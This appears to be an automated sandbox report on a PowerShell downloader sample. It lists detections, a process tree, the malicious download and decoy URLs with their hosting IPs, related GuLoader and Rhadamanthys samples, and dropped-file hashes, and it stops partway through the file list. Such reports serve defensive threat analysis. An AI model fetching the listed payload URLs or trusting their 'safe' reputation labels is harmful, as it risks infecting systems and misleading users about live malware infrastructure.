      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578229 Sample: KcKtHBkskI.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 84 26 x1.i.lencr.org 2->26 28 www.bluemaxxlaser.com 2->28 30 5 other IPs or domains 2->30 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Powershell download and execute 2->42 44 3 other signatures 2->44 9 powershell.exe 16 23 2->9         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 32 www.bluemaxxlaser.com 203.175.174.69, 49703, 80 SGGS-AS-APSGGSSG Singapore 9->32 34 astenterprises.com.pk 107.161.23.150, 443, 49701 RAMNODEUS United States 9->34 46 Powershell creates an autostart link 9->46 15 powershell.exe 20 9->15         started        18 Acrobat.exe 18 73 9->18         started        20 conhost.exe 9->20         started        36 127.0.0.1 unknown unknown 13->36 signatures6 process7 signatures8 48 Loading BitLocker PowerShell Module 15->48 22 AcroCEF.exe 109 18->22         started        process9 process10 24 AcroCEF.exe 22->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      KcKtHBkskI.ps137%ReversingLabsScript-PowerShell.Downloader.Boxter
      KcKtHBkskI.ps1100%AviraTR/PShell.Dldr.VPA

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List0%Avira URL Cloudsafe
      http://www.bluishmaxxlasishr.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.p0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com/ms/ms.vbs0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.214.172
      		truefalse
        		high
        astenterprises.com.pk
        		107.161.23.150
        		truefalse
          		high
          www.bluemaxxlaser.com
          		203.175.174.69
          		truefalse
            		high
            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
            		217.20.58.100
            		truefalse
              		high
              x1.i.lencr.org
              		unknown
              		unknownfalse
                		high
                www.astenterprises.com.pk
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1505237210.0000019897D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1505237210.0000019897E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.12.drfalse
                      		high
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC3853D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://go.micropowershell.exe, 00000000.00000002.1433403188.00000198888F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.microsoft.copowershell.exe, 00000000.00000002.1514703596.00000198A0020000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000D.00000003.1390390863.00000226971A0000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.drfalse
                                          		high
                                          http://go.microspowershell.exe, 00000003.00000002.1291434839.000001FC37C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.1433403188.00000198897A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.adobe.coReaderMessages.11.drfalse
                                                  		high
                                                  http://astenterprises.com.pkpowershell.exe, 00000000.00000002.1433403188.00000198897A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.bluishmaxxlasishr.com/ms/ms.vbspowershell.exe, 00000000.00000002.1433403188.0000019887EF3000.00000004.00000800.00020000.00000000.sdmp, KcKtHBkskI.ps1true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.live.com/odclientsettings/Prod1C:qmgr.db.13.drfalse
                                                      		high
                                                      https://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1433403188.000001988979F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.1433403188.000001988983A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1433403188.00000198897DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1505237210.0000019897D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1505237210.0000019897E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1433403188.0000019887CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.microsoft.cpowershell.exe, 00000003.00000002.1317161256.000001FC4F6A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1433403188.0000019887CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.ppowershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      203.175.174.69
                                                                      		www.bluemaxxlaser.comSingapore
                                                                      		24482SGGS-AS-APSGGSSGfalse
                                                                      107.161.23.150
                                                                      		astenterprises.com.pkUnited States
                                                                      		3842RAMNODEUSfalse

                                                                      Private

                                                                      IP
                                                                      127.0.0.1

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1578229
                                                                      Start date and time:2024-12-19 12:47:20 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 31s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:23
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:KcKtHBkskI.ps1
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:7883e31a07c25e30851390471a8d97e172ec6ec1ec98f49813d166f71cb819a1.ps1
                                                                      Detection:MAL
                                                                      Classification:mal84.evad.winPS1@20/58@4/3
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 83%
                                                                      • Number of executed functions: 6
                                                                      • Number of non-executed functions: 3
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .ps1

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.137, 52.6.155.20, 52.22.41.97, 3.219.243.226, 3.233.129.217, 162.159.61.3, 172.64.41.3, 217.20.58.100, 92.122.16.236, 23.32.239.56, 2.19.198.27, 23.195.61.56, 13.107.246.63, 172.202.163.200, 23.47.168.24
                                                                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7272 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7476 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: KcKtHBkskI.ps1

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      06:48:14API Interceptor69x Sleep call for process: powershell.exe modified
                                                                      06:48:27API Interceptor2x Sleep call for process: svchost.exe modified
                                                                      08:08:48API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      203.175.174.698iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                      • www.bluemaxxlaser.com/ms/ms.vbs
                                                                      R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                      • www.bluemaxxlaser.com/ms/ms.vbs
                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                      • www.bluemaxxlaser.com/ms/ms.vbs
                                                                      fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                      • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                      ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                      • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                      • www.bluemaxxlaser.com/ms/ms.vbs
                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                      • www.bluemaxxlaser.com/ms/ms.vbs
                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                      • www.bluemaxxlaser.com/ms/ms.vbs
                                                                      64Tgzu2FKh.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                      • bluemaxxlaser.com/rh/rheu.bin
                                                                      zp.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                      • bluemaxxlaser.com/rh/rh.bin
                                                                      107.161.23.1508iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                          2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                            tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                              FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                    List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                        List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          bg.microsoft.map.fastly.net8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 199.232.214.172
                                                                                          R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                          • 199.232.210.172
                                                                                          FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.214.172
                                                                                          0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.214.172

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          RAMNODEUS8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                          • 107.161.23.150
                                                                                          FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                          • 107.161.23.150
                                                                                          List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                          • 107.161.23.150
                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                          • 107.161.23.150
                                                                                          SGGS-AS-APSGGSSG8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 203.175.174.69
                                                                                          R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 203.175.174.69
                                                                                          2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 203.175.174.69
                                                                                          fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 203.175.174.69
                                                                                          ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 203.175.174.69
                                                                                          FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 203.175.174.69
                                                                                          yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 203.175.174.69
                                                                                          0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 203.175.174.69
                                                                                          teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                          • 103.14.247.60
                                                                                          na.elfGet hashmaliciousGafgytBrowse
                                                                                          • 103.14.247.29

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eStGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                          • 107.161.23.150
                                                                                          8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                          • 107.161.23.150
                                                                                          v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                          • 107.161.23.150
                                                                                          ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                          • 107.161.23.150
                                                                                          BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                                                                          • 107.161.23.150
                                                                                          HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                                                                                          • 107.161.23.150

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1310720
                                                                                          Entropy (8bit):0.7067158311765371
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq0:2JIB/wUKUKQncEmYRTwh0kee
                                                                                          MD5:CC4CD535163BC5A162AD8549A39DF532
                                                                                          SHA1:F922D8634D7C93A4CCFF9CD30FA9AFE6F4BCF311
                                                                                          SHA-256:9C0F8D0A096D90D7CB76F26DA55F78543DDFB615442317BF9173A0EB592939A7
                                                                                          SHA-512:CA250BFFEACD593B6BB3BB6CC01D42BE3CCEA9823253D302EADC4AA94056DB21330EF44206210E28F778A1A09B377D7F5FB2EDACB0E9428E4D269E31F095FDC6
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdcfad596, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):1310720
                                                                                          Entropy (8bit):0.790047221763226
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
                                                                                          MD5:7B5287633C0C5C48CCE92F3A3B811397
                                                                                          SHA1:52A879757D2B13798C675D24E4A5BB8E77DEC618
                                                                                          SHA-256:C086D1047B941725CB4328B03AB6406738DE3DDAE3539F8E50DA1BF4CD5C0A56
                                                                                          SHA-512:C0B90E51962CE9DAA17CE43C570D93AC7BDF173C7EC6E66EBF5CACA9C06C29AD241DE84A9242E5CA8DC9A000845C7A4F51512B4A0F69597E6557D4431F6C891F
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:...... ...............X\...;...{......................0.`.....42...{5..0...|s.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................,.)..0...|...................H..0...|s..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):0.08269710107324885
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:arGEYeJB2zvNt/57Dek3JetWpEtAllEqW3l/TjzzQ/t:aSEzJB2zvPR3tetWStAmd8/
                                                                                          MD5:C8B73CA26D806B3E1D6147D5A66F609E
                                                                                          SHA1:73386D3F99DA085F6CAD56EEA344E4F303EFDEDF
                                                                                          SHA-256:6A2ADBC504A63BBDB9825CEDC937A707BC80D3495FA2C3B92A3E531E734E6296
                                                                                          SHA-512:356681009BA76A9B33BA49FA2B1A6B20F9EADF865A5CFB83F1C0A77A7BA41A64A4F8EAA5C0F318FA4DE5683BB8013CF8DC7A64E5359C8F13EB67AC521308BC7B
                                                                                          Malicious:false
                                                                                          Preview:..w......................................;...{...0...|s.42...{5.........42...{5.42...{5...Y.42...{59.................H..0...|s.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):300
                                                                                          Entropy (8bit):5.301775254510903
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7DXV+q2PcNwi2nKuAl9OmbnIFUt8OD6Zmw+ODWVkwOcNwi2nKuAl9OmbjLJ:7DXgvLZHAahFUt8OD6/+ODG54ZHAaSJ
                                                                                          MD5:40934D63C7F51F8B9F07BE7BECE51DC5
                                                                                          SHA1:AA9D0E770781F17999D3C0538A7725DC00E9B6AF
                                                                                          SHA-256:95D86CE2047E7D845BFF0CDADBCA7C5269FDCD1FBBAFE5E8582F83060004AB94
                                                                                          SHA-512:AA2F57EAF936B970C748626C5025FE07BCE0D14CD2F759AB25CCE3AAF1E01CCC83DB626A87239EF857DE2A336803FA108F8D76CA6BE2D8D97E3458AB6742DE14
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.385 1668 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:48:27.388 1668 Recovering log #3.2024/12/19-06:48:27.388 1668 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):300
                                                                                          Entropy (8bit):5.301775254510903
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7DXV+q2PcNwi2nKuAl9OmbnIFUt8OD6Zmw+ODWVkwOcNwi2nKuAl9OmbjLJ:7DXgvLZHAahFUt8OD6/+ODG54ZHAaSJ
                                                                                          MD5:40934D63C7F51F8B9F07BE7BECE51DC5
                                                                                          SHA1:AA9D0E770781F17999D3C0538A7725DC00E9B6AF
                                                                                          SHA-256:95D86CE2047E7D845BFF0CDADBCA7C5269FDCD1FBBAFE5E8582F83060004AB94
                                                                                          SHA-512:AA2F57EAF936B970C748626C5025FE07BCE0D14CD2F759AB25CCE3AAF1E01CCC83DB626A87239EF857DE2A336803FA108F8D76CA6BE2D8D97E3458AB6742DE14
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.385 1668 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:48:27.388 1668 Recovering log #3.2024/12/19-06:48:27.388 1668 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):341
                                                                                          Entropy (8bit):5.27639858262341
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7DRqHN+q2PcNwi2nKuAl9Ombzo2jMGIFUt8OD2/Zmw+OD2wtVkwOcNwi2nKuAl97:7DRqovLZHAa8uFUt8OD2//+OD2k54ZHA
                                                                                          MD5:9D61F8545AF42BF72753C890FB8684FD
                                                                                          SHA1:3C96E10D77A7F974938FB82A4AB070D6F8B4EAAF
                                                                                          SHA-256:D7D1F125937868AB6CF857F70C567D1BF4CFC7AF5E16D8CE14F370F55BED20AA
                                                                                          SHA-512:E5395E8D8596A2F2F9A1F356AF00B16BCDBDD6A4168BB065DF73C9440357798BAC7A5EDED765622680A9F0AAEBB2B0CEE0DA165F0C30CB1CAFF1C07AC4001139
                                                                                          Malicious:false
                                                                                          Preview:2024/12/19-06:48:27.632 548 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:48:27.643 548 Recovering log #3.2024/12/19-06:48:27.644 548 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                          Download File
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):341
                                                                                          Entropy (8bit):5.27639858262341
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:7DRqHN+q2PcNwi2nKuAl9Ombzo2jMGIFUt8OD2/Zmw+OD2wtVkwOcNwi2nKuAl97:7DRqovLZHAa8uFUt8OD2//+OD2k54ZHA
                                                                                          MD5:9D61F8545AF42BF72753C890FB8684FD
                                                                                          SHA1:3C96E10D77A7F974938FB82A4AB070D6F8B4EAAF
                                                                                          SHA-256:D7D1F125937868AB6CF857F70C567D1BF4CFC7AF5E16D8CE14F370F55BED20AA
                                                                                          SHA-512:E5395E8D8596A2F2F9A1F356AF00B16BCDBDD6A4168BB065DF73C9440357798BAC7A5EDED765622680A9F0AAEBB2B0CEE0DA165F0C30CB1CAFF1C07AC4001139
                                                                                          Malicious:false
